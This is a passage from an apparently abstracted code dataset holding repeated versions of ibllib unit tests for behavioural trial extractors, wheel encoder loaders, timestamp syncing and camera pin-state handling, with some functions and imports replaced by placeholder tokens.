unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = 
t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio 
dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        self.assertEqual(matches.size, tsb.size)\n        matches = camera.attribute_times(tsa, tsb, take='nearest')\n        expected[np.r_[1:3]] = expected[1:3] + 1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, take='after')\n        missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n            25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n        expected[missing] = -1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, tol=0.05)\n        expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n            49, 53, 57])\n        np.testing.assert_array_equal(matches[matches > -1], expected)\n        matches = camera.attribute_times(tsa, tsb, injective=False, take=\n            'nearest')\n        expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        with self.assertRaises(ValueError):\n            camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n    def setUp(self):\n        self.main_path = Path(__file__).parent\n        self.training_lt5 = {'path': self.main_path / 'data' /\n            'session_training_lt5'}\n        self.biased_lt5 = {'path': self.main_path / 'data' /\n            'session_biased_lt5'}\n        self.training_ge5 = {'path': self.main_path / 'data' /\n            'session_training_ge5'}\n        self.biased_ge5 = {'path': self.main_path / 'data' /\n            'session_biased_ge5'}\n        self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n            'path']))\n        self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n            )\n        self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n            'path']))\n        self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n            )\n        self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n        self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n        <function 
token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = 
biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n 
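# NOTE (editor): alfio.check_dimensions(trials) == 0 in the assertions\n        # below means every attribute of the loaded ALF object has a consistent\n        # length, i.e. one entry per trial across all extracted datasets.\n        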
extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 
2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        self.assertEqual(matches.size, tsb.size)\n        matches = camera.attribute_times(tsa, tsb, take='nearest')\n        expected[np.r_[1:3]] = expected[1:3] + 1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, take='after')\n        missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n            25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n        expected[missing] = -1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, tol=0.05)\n        expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n            49, 53, 57])\n        np.testing.assert_array_equal(matches[matches > -1], 
expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == 
max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n <function token>\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with 